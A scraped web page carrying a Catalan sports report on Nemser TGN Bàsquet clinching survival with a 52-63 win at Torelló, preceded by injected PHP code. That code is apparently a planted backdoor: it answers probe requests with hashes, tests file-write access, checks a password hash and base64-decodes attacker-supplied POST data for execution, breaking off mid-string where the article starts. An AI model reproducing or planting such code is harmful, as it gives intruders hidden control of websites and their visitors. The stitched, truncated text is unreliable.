function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Nemser TGN Bàsquet certifica la salvació a la pista del Torelló (52-63) - Tgn Bàsquet Club -

El Nemser TGN Bàsquet certifica la salvació a la pista del Torelló (52-63)

Updated: maig 31, 2014

S’ho mereixien. L’esforç, el treball, la fe en les seves possibilitats, la capacitat de superar totes les adversitats de la temporada (la majoria en forma de lesions) i l’esperit competitiu contra rivals aparentment més forts, va tenir el seu premi. El Nemser TGN Bàsquet va certificar la salvació després de vèncer en el segon partit del play-off de descens a la pista del Torelló en un matx dominat des del segon període pel conjunt lila. La permanència és un premi per a un grup extremadament solvent, una pinya sense fissures, un bloc sòlid que ha caminat en la direcció que li ha marcat el seu entrenador, Juan Carlos Arjona, un tècnic que ha patit molt i que ha treballat encara més per treure tot el suc possible d’un grup que ha anat perdent elements amb el pas del curs i que ha vist com la sort li ha girat l’esquena en molts moments, sobretot en les derrotes en finals igualats, que han estat molt nombrosos.

El Nemser TGN Bàsquet, fidel a la tradició, va arribar al partit trascendental, sense una altra jugadora. L’heroïna del primer matx, Gina Fort, que va anotar la cistella del triomf en l’últim segon (48-47), va passar la nit a urgències per un dolor abdominal. Sense ella, l’equip no tenia més que una base pura, Anais Muñoz, i Arjona va decidir renunciar a pressionar a tota la pista per conservar el físic de les seves jugadores. No li va sortir gens malament. El Nemser va encaixar molt bé els dos triples de sortida del Torelló i va ser capaç d’arribar al final del primer període amb empat a 12. Una de les grans preocupacions d’Arjona, el rebot defensiu, va ser solventat per les seves jugadores amb una gran dosi de lluita i, en el segon quart, el partit va anar agafant un clar color lila. El Nemser TGN Bàsquet, que va jugar més relaxat que en el primer assalt al pavelló Sagrat Cor, va poder fer allò que més li agrada, sortir al contraatac i, d’aquesta manera, va arribar al descans amb 11 punts d’avantatge (18-29). Aquest període va ser clau per la victòria final.

El Torelló, que havia estat molt desencertat en atac en els primers vint minuts, va decidir intensificar la seva defensa i això va provocar nombroses pèrdues de pilota visitants. El matx es va igualar (en parcials) però l’avantatge visitant es mantenia tot i els esforços locals (41-45 a 8 minuts del final). Van ser minuts de pressió a tota la pista del Torelló i Arjona va haver de demanar temps mort per superar la defensa local. Amb tot, la serenor a l’hora d’afrontar els tirs lliures (gran partit de García) i la solidesa defensiva, van culminar un triomf històric i merescut que deixa el Nemser TGN Bàsquet, un curs més, a la Primera Catalana.

JUAN CARLOS ARJONA

“Estic molt orgullós del treball de les jugadores  durant tot l’any. Amb tots els problemes de lesions que hem tingut  hem sabut competir en tots el partits”

“En aquests moments sóc l’home més feliç del món. El que hem fet té molt mèrit”

“Ens ho mereixíem. Hem patit moltes adversitats durant tot el curs i les hem superat”